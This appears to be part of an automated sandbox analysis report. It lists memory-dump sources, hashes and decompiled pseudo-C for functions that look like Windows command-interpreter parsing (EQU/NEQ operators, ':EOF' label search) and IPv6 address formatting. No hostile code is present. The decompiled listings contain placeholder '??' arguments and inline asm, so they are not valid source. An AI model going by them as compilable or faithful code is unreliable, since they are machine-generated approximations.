                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Heap$AllocProcess$_wcsicmp
                                • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                • API String ID: 3463597064-3086019870
                                • Opcode ID: cf7378d6f573326085f0d53c3a85cc9ebbef10a0326a15d3b07434d0ee22c990
                                • Instruction ID: 16d49062e172553d65de01c430dd3e971bbec9d6b9485cc13c26d0c01c9a8255
                                • Opcode Fuzzy Hash: cf7378d6f573326085f0d53c3a85cc9ebbef10a0326a15d3b07434d0ee22c990
                                • Instruction Fuzzy Hash: 3141F3B6508202AEE315EF78DF409667BFCEF46310B15486BE544EB659EB30DE40CB29
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A556262, Relevance: 18.1, APIs: 6, Strings: 6, Instructions: 127COMMON
                                Download Yara Rule
                                C-Code - Quality: 20%
                                			E4A556262(void* __eflags, intOrPtr* _a4) {
				void* __edi;
				intOrPtr _t15;
				intOrPtr* _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr* _t32;
				intOrPtr* _t33;
				intOrPtr _t46;
				intOrPtr _t48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t52;

				_t15 = E4A553D56(0x4a588640, 0);
				_t32 = _a4;
				_t51 = 4;
				 *((intOrPtr*)(_t32 + 0x38)) = _t15;
				if(E4A551CBF(0x4a588640, _t51) != 0x4000) {
					E4A56EE72();
				}
				_t33 = E4A556304;
				_t18 = 0x4a588640;
				while(1) {
					_t48 =  *_t18;
					if(_t48 !=  *_t33) {
						break;
					}
					if(_t48 == 0) {
						L14:
						_t18 = 0;
						L5:
						if(_t18 == 0) {
							L1:
							_t19 = E4A553D56(0x4a588640, 0);
							 *((intOrPtr*)(_t32 + 0x3c)) = _t19;
							return _t19;
						}
						_t20 =  *0x4a574178; // 0x0
						if(_t20 >= _t51 &&  *0x4a588640 == 0x3d &&  *0x4a588642 == 0x3d) {
							 *((intOrPtr*)(_t32 + 0x3c)) = E4A552041(_t20 + _t20 - 4);
							_t46 =  *0x4a574178; // 0x0
							return E4A55185A(_t30, _t46 + 0xfffffffe, 0x4a588644);
						}
						if( *0x4a574081 == 0) {
							return E4A56EE72();
						} else {
							_t52 = __imp___wcsicmp;
							_push("EQU");
							_push(0x4a588640);
							if( *_t52() == 0) {
								 *((intOrPtr*)(_t32 + 0x44)) = 1;
							} else {
								_push("NEQ");
								_push(0x4a588640);
								if( *_t52() == 0) {
									 *((intOrPtr*)(_t32 + 0x44)) = 2;
								} else {
									_push("LSS");
									_push(0x4a588640);
									if( *_t52() == 0) {
										 *((intOrPtr*)(_t32 + 0x44)) = 3;
									} else {
										_push("LEQ");
										_push(0x4a588640);
										if( *_t52() == 0) {
											 *((intOrPtr*)(_t32 + 0x44)) = 4;
										} else {
											_push("GTR");
											_push(0x4a588640);
											if( *_t52() != 0) {
												_push("GEQ");
												_push(0x4a588640);
												if( *_t52() != 0) {
													E4A56EE72();
												} else {
													 *((intOrPtr*)(_t32 + 0x44)) = 6;
												}
											} else {
												 *((intOrPtr*)(_t32 + 0x44)) = 5;
											}
										}
									}
								}
							}
							 *_t32 = 0x3a;
							goto L1;
						}
					}
					_t49 =  *((intOrPtr*)(_t18 + 2));
					_t8 = _t33 + 2; // 0x3d
					if(_t49 !=  *_t8) {
						break;
					}
					_t18 = _t18 + _t51;
					_t33 = _t33 + _t51;
					if(_t49 != 0) {
						continue;
					}
					goto L14;
				}
				asm("sbb eax, eax");
				asm("sbb eax, 0xffffffff");
				goto L5;
			}















                                0x4a55626c
                                0x4a556271
                                0x4a556276
                                0x4a556278
                                0x4a556285
                                0x4a567d87
                                0x4a567d87
                                0x4a556290
                                0x4a556295
                                0x4a556297
                                0x4a556297
                                0x4a55629d
                                0x00000000
                                0x00000000
                                0x4a556339
                                0x4a556356
                                0x4a556356
                                0x4a5562a8
                                0x4a5562aa
                                0x4a555404
                                0x4a555406
                                0x4a55540b
                                0x00000000
                                0x4a55540b
                                0x4a5562b0
                                0x4a5562b7
                                0x4a5562e3
                                0x4a5562e6
                                0x00000000
                                0x4a5562f6
                                0x4a55d9c4
                                0x00000000
                                0x4a55d9ca
                                0x4a55d9ca
                                0x4a55d9d0
                                0x4a55d9d5
                                0x4a55d9dc
                                0x4a55da5c
                                0x4a55d9de
                                0x4a55d9de
                                0x4a55d9e3
                                0x4a55d9ea
                                0x4a55da65
                                0x4a55d9ec
                                0x4a55d9ec
                                0x4a55d9f1
                                0x4a55d9f8
                                0x4a55f3ee
                                0x4a55d9fe
                                0x4a55d9fe
                                0x4a55da03
                                0x4a55da0a
                                0x4a55f462
                                0x4a55da10
                                0x4a55da10
                                0x4a55da15
                                0x4a55da1c
                                0x4a56040e
                                0x4a560413
                                0x4a56041a
                                0x4a560428
                                0x4a56041c
                                0x4a56041c
                                0x4a56041c
                                0x4a55da22
                                0x4a55da22
                                0x4a55da22
                                0x4a55da1c
                                0x4a55da0a
                                0x4a55d9f8
                                0x4a55d9ea
                                0x4a55da29
                                0x00000000
                                0x4a55da29
                                0x4a55d9c4
                                0x4a55633b
                                0x4a55633f
                                0x4a556343
                                0x00000000
                                0x00000000
                                0x4a556349
                                0x4a55634b
                                0x4a556350
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a556350
                                0x4a5562a3
                                0x4a5562a5
                                0x00000000

                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                • API String ID: 0-3124875276
                                • Opcode ID: 4ff29c0e1c53aa1d0c107c533f7decf909d77de3c55815f861c7f5847d08a400
                                • Instruction ID: ca3e6795c79c0d10b5edea712b3b61c78ce7368726edb0b06f1a36f1bf7e57b6
                                • Opcode Fuzzy Hash: 4ff29c0e1c53aa1d0c107c533f7decf909d77de3c55815f861c7f5847d08a400
                                • Instruction Fuzzy Hash: DA3104B3509202A6EB24EBA1DF80B1B7FA8DF927B0F45001BD604DA98DEB75C480C751
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022D13CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                Download Yara Rule
                                C-Code - Quality: 38%
                                			E022D13CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E022C7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x2292926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E022C7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x2299cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E022C7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E022C7707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E022C7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E022C7707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                0x022d13d5
                                0x022d13d9
                                0x022d13dc
                                0x022d13de
                                0x022d13e1
                                0x022d13e8
                                0x022d13ee
                                0x022fe8fd
                                0x00000000
                                0x022fe921
                                0x022fe921
                                0x022fe928
                                0x022fe982
                                0x022fe98a
                                0x00000000
                                0x022fe99a
                                0x022fe99e
                                0x022fe9a3
                                0x022fe9a8
                                0x022fe9b9
                                0x022fe978
                                0x00000000
                                0x022fe978
                                0x022fe98a
                                0x022fe92a
                                0x022fe931
                                0x022fe944
                                0x022fe944
                                0x022fe950
                                0x022fe954
                                0x022fe959
                                0x022fe95e
                                0x022fe963
                                0x022fe970
                                0x00000000
                                0x022fe975
                                0x022fe93b
                                0x022fe980
                                0x00000000
                                0x022fe980
                                0x022fe942
                                0x022fe94b
                                0x00000000
                                0x022fe94b
                                0x00000000
                                0x022fe942
                                0x022d13f4
                                0x022d13f4
                                0x022d13f9
                                0x022d13fc
                                0x022d13ff
                                0x022d1406
                                0x022fe9cc
                                0x022fe9d2
                                0x022fe9d2
                                0x022fe9cc
                                0x022d140c
                                0x022d1411
                                0x022d1431
                                0x022d143a
                                0x022d143c
                                0x022d143f
                                0x022d143f
                                0x022d1442
                                0x022d1447
                                0x022d14a8
                                0x022d14ac
                                0x022fe9e2
                                0x022fe9e7
                                0x022fe9ec
                                0x022fea05
                                0x022fea05
                                0x00000000
                                0x022d1449
                                0x00000000
                                0x022d1449
                                0x022d144c
                                0x022d1459
                                0x022d1462
                                0x022d1469
                                0x022d146a
                                0x022d1470
                                0x022d1473
                                0x022d1476
                                0x022d1476
                                0x022d1490
                                0x022d1495
                                0x022d138e
                                0x022d1390
                                0x022d1397
                                0x022d1398
                                0x022d1399
                                0x022d13a1
                                0x022d13a4
                                0x022d13a4
                                0x022d1498
                                0x022d149c
                                0x022d149f
                                0x022d14a2
                                0x00000000
                                0x00000000
                                0x022d14a4
                                0x00000000
                                0x022d14a4
                                0x022d1413
                                0x022d1415
                                0x022d1416
                                0x022d1419
                                0x022d141c
                                0x022d1422
                                0x022d13b7
                                0x022d13bc
                                0x022d13bf
                                0x022d13bf
                                0x022d13c2
                                0x022d1424
                                0x022d1424
                                0x022d1424
                                0x022d1427
                                0x022d142b
                                0x022d142c
                                0x022d142c
                                0x022d142c
                                0x00000000
                                0x022d141c
                                0x022d1411

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2392323455.0000000002280000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true
                                • Associated: 00000009.00000002.2392311741.0000000002270000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392591356.0000000002360000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392597984.0000000002370000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392615842.0000000002374000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392633868.0000000002377000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392644032.0000000002380000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392726926.00000000023E0000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                • API String ID: 48624451-2108815105
                                • Opcode ID: 6a29cec9ab95d0a12ae8769944c9115179fd98620c352a7a1c19d8b3f0dade34
                                • Instruction ID: 32067bb0ab8247e80fadfe00336289f9088717c92cb63197d684a0e0438be6d0
                                • Opcode Fuzzy Hash: 6a29cec9ab95d0a12ae8769944c9115179fd98620c352a7a1c19d8b3f0dade34
                                • Instruction Fuzzy Hash: 60612671D20656AADF34DFE9C8809BEBBB6EF84300754C12DE5DA47948D374A650CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02333B8E, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187COMMON
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E02333B8E(intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				void* _t84;
				void* _t87;
				intOrPtr* _t97;
				void* _t104;
				void* _t106;
				void* _t109;
				intOrPtr _t116;
				signed int _t117;
				signed int _t122;
				signed int _t126;
				char _t127;
				signed int _t128;
				intOrPtr* _t133;
				void* _t134;

				_t133 = _a4;
				_t122 = 0;
				_t109 = _a8 + 0x2e;
				_v12 = 8;
				if( *_t133 != 0 ||  *((intOrPtr*)(_t133 + 2)) != 0 ||  *((intOrPtr*)(_t133 + 4)) != 0 ||  *((intOrPtr*)(_t133 + 6)) != 0 ||  *(_t133 + 0xc) == 0) {
					L17:
					_a4 = _t122;
					_v8 = _t122;
					_v16 = _t122;
					if(( *(_t133 + 8) & 0x0000fffd) == 0 &&  *(_t133 + 0xa) == 0xfe5e) {
						_v12 = 6;
					}
					_t127 = _v12;
					if(_t127 <= _t122) {
						L27:
						if(_a4 - _v8 <= 1) {
							_a4 = _t122;
							_v8 = _t122;
						}
						_t128 = 0;
						if(_v12 > _t122) {
							L33:
							L33:
							if(_v8 > _t128 || _t128 >= _a4) {
								if(_t128 != _t122 && _t128 != _a4) {
									_push(0x2299c7e);
									_push(_t109 - _a8);
									_push(_a8);
									_t87 = E0234894A();
									_t134 = _t134 + 0xc;
									_a8 = _a8 + _t87;
								}
								_t84 = E0234894A(_a8, _t109 - _a8, 0x2299c7a,  *(_t133 + _t128 * 2) & 0x0000ffff);
								_t134 = _t134 + 0x10;
								_a8 = _a8 + _t84;
							} else {
								_push(0x2299c80);
								_push(_t109 - _a8);
								_push(_a8);
								_a8 = _a8 + E0234894A();
								_t134 = _t134 + 0xc;
								_t128 = _a4 - 1;
							}
							_t128 = _t128 + 1;
							if(_t128 < _v12) {
								goto L32;
							}
							goto L41;
							L32:
							_t122 = 0;
							goto L33;
						} else {
							L41:
							if(_v12 < 8) {
								_push( *(_t133 + 0xf) & 0x000000ff);
								_push( *(_t133 + 0xe) & 0x000000ff);
								_push( *(_t133 + 0xd) & 0x000000ff);
								_a8 = _a8 + E0234894A(_a8, _t109 - _a8, ":%u.%u.%u.%u",  *(_t133 + 0xc) & 0x000000ff);
							}
							return _a8;
						}
					} else {
						_t116 = 1;
						_t97 = _t133;
						_v20 = _t127;
						do {
							if( *_t97 != _t122) {
								_v16 = _t116;
							} else {
								if(_t116 - _v16 > _a4 - _v8) {
									_v8 = _v16;
									_a4 = _t116;
								}
								_t122 = 0;
							}
							_t97 = _t97 + 2;
							_t116 = _t116 + 1;
							_t40 =  &_v20;
							 *_t40 = _v20 - 1;
						} while ( *_t40 != 0);
						goto L27;
					}
				} else {
					_t126 =  *(_t133 + 8) & 0x0000ffff;
					if(_t126 != 0) {
						L13:
						if(_t126 != 0xffff ||  *(_t133 + 0xa) != 0) {
							_t122 = 0;
							goto L17;
						} else {
							_push( *(_t133 + 0xf) & 0x000000ff);
							_push( *(_t133 + 0xe) & 0x000000ff);
							_push( *(_t133 + 0xd) & 0x000000ff);
							_t104 = E0234894A(_a8, _t109 - _a8, "::ffff:0:%u.%u.%u.%u",  *(_t133 + 0xc) & 0x000000ff);
							L12:
							return _t104 + _a8;
						}
					}
					_t117 =  *(_t133 + 0xa) & 0x0000ffff;
					if(_t117 == 0) {
						L9:
						_t106 = 0x2292926;
						L11:
						_push( *(_t133 + 0xf) & 0x000000ff);
						_push( *(_t133 + 0xe) & 0x000000ff);
						_push( *(_t133 + 0xd) & 0x000000ff);
						_push( *(_t133 + 0xc) & 0x000000ff);
						_t104 = E0234894A(_a8, _t109 - _a8, "::%hs%u.%u.%u.%u", _t106);
						goto L12;
					}
					if(_t117 != 0xffff) {
						goto L13;
					}
					if(_t117 != 0) {
						_t106 = 0x2299cac;
						goto L11;
					}
					goto L9;
				}
			}





















                                0x02333b9b
                                0x02333b9e
                                0x02333ba0
                                0x02333ba4
                                0x02333bae
                                0x02333c74
                                0x02333c79
                                0x02333c7c
                                0x02333c7f
                                0x02333c86
                                0x02333c93
                                0x02333c93
                                0x02333c9a
                                0x02333c9f
                                0x02333cd0
                                0x02333cd9
                                0x02333cdb
                                0x02333cde
                                0x02333cde
                                0x02333ce1
                                0x02333ce6
                                0x00000000
                                0x02333cf1
                                0x02333cf4
                                0x02333d1c
                                0x02333d28
                                0x02333d2d
                                0x02333d2e
                                0x02333d31
                                0x02333d36
                                0x02333d39
                                0x02333d39
                                0x02333d56
                                0x02333d5b
                                0x02333d5e
                                0x02333cfb
                                0x02333d00
                                0x02333d05
                                0x02333d06
                                0x02333d11
                                0x02333d14
                                0x02333d17
                                0x02333d17
                                0x02333d61
                                0x02333d65
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02333cef
                                0x02333cef
                                0x00000000
                                0x02333ce8
                                0x02333d67
                                0x02333d6b
                                0x02333d74
                                0x02333d79
                                0x02333d7e
                                0x02333d95
                                0x02333d95
                                0x00000000
                                0x02333d98
                                0x02333ca1
                                0x02333ca3
                                0x02333ca4
                                0x02333ca6
                                0x02333ca9
                                0x02333cac
                                0x02333cea
                                0x02333cae
                                0x02333cbb
                                0x02333cc0
                                0x02333cc3
                                0x02333cc3
                                0x02333cc6
                                0x02333cc6
                                0x02333cc9
                                0x02333cca
                                0x02333ccb
                                0x02333ccb
                                0x02333ccb
                                0x00000000
                                0x02333ca9
                                0x02333bdc
                                0x02333bdc
                                0x02333be8
                                0x02333c3c
                                0x02333c3f
                                0x02333c72
                                0x00000000
                                0x02333c48
                                0x02333c4f
                                0x02333c54
                                0x02333c59
                                0x02333c68
                                0x02333c34
                                0x00000000
                                0x02333c34
                                0x02333c3f
                                0x02333bea
                                0x02333bf1
                                0x02333bff
                                0x02333bff
                                0x02333c0b
                                0x02333c12
                                0x02333c17
                                0x02333c1c
                                0x02333c21
                                0x02333c2c
                                0x00000000
                                0x02333c31
                                0x02333bf8
                                0x00000000
                                0x00000000
                                0x02333bfd
                                0x02333c06
                                0x00000000
                                0x02333c06
                                0x00000000
                                0x02333bfd

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2392323455.0000000002280000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true
                                • Associated: 00000009.00000002.2392311741.0000000002270000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392591356.0000000002360000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392597984.0000000002370000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392615842.0000000002374000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392633868.0000000002377000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392644032.0000000002380000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392726926.00000000023E0000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                • API String ID: 48624451-2108815105
                                • Opcode ID: 5f692cf41e91656f8e2f14773b24d81d9a2c2a6d4f1b4fb43c13c27d53e2bec9
                                • Instruction ID: ab0982ccc2445cc5a2f7d1d88b71a8863dde4ae314200a1bff9297009c85d0a7
                                • Opcode Fuzzy Hash: 5f692cf41e91656f8e2f14773b24d81d9a2c2a6d4f1b4fb43c13c27d53e2bec9
                                • Instruction Fuzzy Hash: 0B61B5B6904644AFDF21DF99C8405BE7BF5EF58221B14C5AAF8A987505E334EBC0CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A556447, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 168COMMON
                                Download Yara Rule
                                C-Code - Quality: 31%
                                			E4A556447(void* __edx, LONG* _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				long _v524;
				int _v528;
				short* _v532;
				int _v536;
				int _v540;
				long _v544;
				LONG* _v548;
				short* _v552;
				signed int _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t58;
				void* _t70;
				void* _t74;
				void* _t77;
				short* _t84;
				short* _t85;
				void* _t86;
				char* _t91;
				void* _t99;
				long _t102;
				void* _t111;
				int _t117;
				void* _t121;
				intOrPtr _t122;
				intOrPtr* _t124;
				short* _t126;
				int _t135;
				signed int _t136;
				void* _t137;
				intOrPtr _t142;

				_t121 = __edx;
				_t58 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t58 ^ _t136;
				_t123 = _a4;
				_t122 =  *0x4a5740b4; // 0x0
				_t61 = 1;
				_v548 = _t123;
				_v536 = 1;
				_v540 = 0;
				if(_t122 == 0) {
					L8:
					return E4A5513A9(_t61, 0, _v8 ^ _t136, _t121, _t122, _t123);
				}
				_t107 = _t123[0xf];
				if(_t123[0xf] == 0) {
					E4A5557F4(1, _t122);
					_push(0);
					_push(0x2330);
					 *0x4a5740b4 =  *((intOrPtr*)(_t122 + 0x110));
					E4A556D44(_t107);
					L38:
					_t61 = 1;
					goto L8;
				}
				E4A55654D(_t107,  &_v264, 0x80, 1);
				_v556 =  *(_t122 + 8);
				_t70 = E4A554D4E(_t122);
				_v524 = _t70;
				if(_t70 == 0xffffffff) {
					goto L38;
				}
				__imp___get_osfhandle(0);
				_v544 = GetFileSize(_t70, _t70);
				_t72 = E4A552B0D(_t123[0xf], 0);
				_t123 = _t72;
				_t142 =  *0x4a574081; // 0x0
				if(_t142 == 0) {
					while(1) {
						L22:
						E4A554B2A(_t72);
						_t124 = __imp___get_osfhandle;
						_t74 =  *_t124(_v524, 0, 0, 1);
						_pop(_t111);
						_t75 = SetFilePointer(_t74, ??, ??, ??);
						 *(_t122 + 8) = _t75;
						if(_t75 >= _v556 && _v536 == 0) {
							break;
						}
						_t77 =  *_t124(_v524, 0x4a588640, 0x200,  &_v528);
						_pop(_t111);
						_push(_t77);
						if(E4A5567D3() == 0) {
							break;
						}
						_t75 = _v528;
						if(_t75 == 0) {
							L32:
							if(_v536 == 0) {
								L39:
								E4A5557F4(_t75, _t122);
								 *0x4a5740b4 =  *((intOrPtr*)(_t122 + 0x110));
								_t123 = 1;
								E4A556D44(_t111, 0x400023ab, 1,  &_v264);
								_v540 = 1;
								L7:
								E4A553AB3(_v524);
								_t61 = _v540;
								goto L8;
							}
							_t72 = SetFilePointer( *_t124(0), _v524, 0, 0);
							_v536 = 0;
							continue;
						}
						if(_t75 == 0xffffffff ||  *0x4a588640 == 0 || _v264 == 0) {
							break;
						} else {
							0x4a588640[_t75] = 0;
							_t126 = E4A5518EB(0x4a588640, 0x3a);
							if(_t126 == 0) {
								continue;
							} else {
								goto L30;
							}
							do {
								L30:
								_t84 = _t126;
								while(1) {
									_v532 = _t84;
									if( *_t84 == 0xa) {
										break;
									}
									if(_t84 == 0x4a588640) {
										break;
									}
									_t84 = _t84;
								}
								if( *_t84 != 0x3a) {
									_v532 = _t84;
								}
								_t85 = E4A552B0D(_t84, 0);
								_v552 = _t85;
								if( *_t85 == 0x3a) {
									_t86 = E4A5518EB(_v532, 0xa);
									_t123 = _t86;
									if(_t123 == 0) {
										__imp___get_osfhandle(1);
										if(SetFilePointer(_t86, _v524, 0, 0) == _v544) {
											goto L10;
										}
										_t117 = _v528;
										if(_t117 == 0x200) {
											goto L10;
										}
										_t135 = _t117 - (_v532 - 0x4a588640 >> 1);
										_t99 = E4A55661C();
										if(_t99 != 0) {
											_t99 = WideCharToMultiByte( *0x4a5741b8, 0, 0x4a588640, _t135, 0, 0, 0, 0);
											_t135 = _t99;
										}
										_t123 =  ~_t135;
										__imp___get_osfhandle(1);
										_t72 = SetFilePointer(_t99, _v524,  ~_t135, 0);
										break;
									}
									L10:
									E4A55654D(_v552,  &_v520, 0x80, 0);
									_t91 =  &_v264;
									__imp___wcsicmp(_t91,  &_v520);
									if(_t91 != 0) {
										goto L20;
									}
									 *0x4a5740b8 = _v548[0x10] & 0x00000001;
									_t72 = E4A55661C();
									if(_t123 == 0) {
										if(_t72 == 0) {
											_t72 = _v528;
											L50:
											 *(_t122 + 8) =  *(_t122 + 8) + _t72;
											break;
										}
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(_v528);
										_push(0x4a588640);
										L49:
										_t72 = WideCharToMultiByte( *0x4a5741b8, 0, ??, ??, ??, ??, ??, ??);
										goto L50;
									}
									if(_t72 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(_t123);
										_push(0x4a588640);
										goto L49;
									}
									 *(_t122 + 8) = _t123 +  *(_t122 + 8);
									break;
								}
								L20:
								_t126 = E4A5518EB(_t123, 0x3a);
							} while (_t126 != 0);
							if( *0x4a5740b8 == 1) {
								goto L7;
							}
							continue;
						}
					}
					if(_v528 != 0) {
						goto L39;
					}
					goto L32;
				}
				__imp___wcsnicmp(_t123, L":EOF", 4);
				_t137 = _t137 + 0xc;
				if(_t72 != 0) {
					goto L22;
				}
				_t102 = _t123[2] & 0x0000ffff;
				if(_t102 != 0) {
					if(iswspace(_t102) != 0) {
						goto L6;
					}
					goto L22;
				}
				L6:
				 *(_t122 + 8) = _v544;
				 *0x4a5740b8 = 1;
				goto L7;
			}






































                                0x4a556447
                                0x4a556452
                                0x4a556459
                                0x4a55645e
                                0x4a556464
                                0x4a55646c
                                0x4a55646d
                                0x4a556473
                                0x4a556479
                                0x4a556481
                                0x4a556537
                                0x4a556545
                                0x4a556545
                                0x4a556487
                                0x4a55648c
                                0x4a5646fe
                                0x4a564709
                                0x4a56470a
                                0x4a56470f
                                0x4a564714
                                0x4a5601d6
                                0x4a5601d8
                                0x00000000
                                0x4a5601d8
                                0x4a5564a0
                                0x4a5564a9
                                0x4a5564af
                                0x4a5564b4
                                0x4a5564bd
                                0x00000000
                                0x00000000
                                0x4a5564c5
                                0x4a5564d7
                                0x4a5564dd
                                0x4a5564e2
                                0x4a5564e4
                                0x4a5564ea
                                0x4a556716
                                0x4a556716
                                0x4a556716
                                0x4a55671b
                                0x4a55672b
                                0x4a55672d
                                0x4a55672f
                                0x4a55673b
                                0x4a55673e
                                0x00000000
                                0x00000000
                                0x4a556763
                                0x4a556765
                                0x4a556766
                                0x4a55676e
                                0x00000000
                                0x00000000
                                0x4a556774
                                0x4a55677c
                                0x4a55f406
                                0x4a55f40c
                                0x4a5601de
                                0x4a5601df
                                0x4a5647cd
                                0x4a5647db
                                0x4a5647e2
                                0x4a5647ea
                                0x4a556526
                                0x4a55652c
                                0x4a556531
                                0x00000000
                                0x4a556531
                                0x4a55f41f
                                0x4a55f425
                                0x00000000
                                0x4a55f425
                                0x4a556785
                                0x00000000
                                0x4a5567a5
                                0x4a5567ae
                                0x4a5567bb
                                0x4a5567bf
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a5567c5
                                0x4a5567c5
                                0x4a5567c5
                                0x4a5566c6
                                0x4a5566ca
                                0x4a5566d0
                                0x00000000
                                0x00000000
                                0x4a5566c2
                                0x00000000
                                0x00000000
                                0x4a5566c5
                                0x4a5566c5
                                0x4a5566d6
                                0x4a5566da
                                0x4a5566da
                                0x4a5566e2
                                0x4a5566eb
                                0x4a5566f1
                                0x4a556648
                                0x4a55664d
                                0x4a556651
                                0x4a5601b7
                                0x4a5601cb
                                0x00000000
                                0x00000000
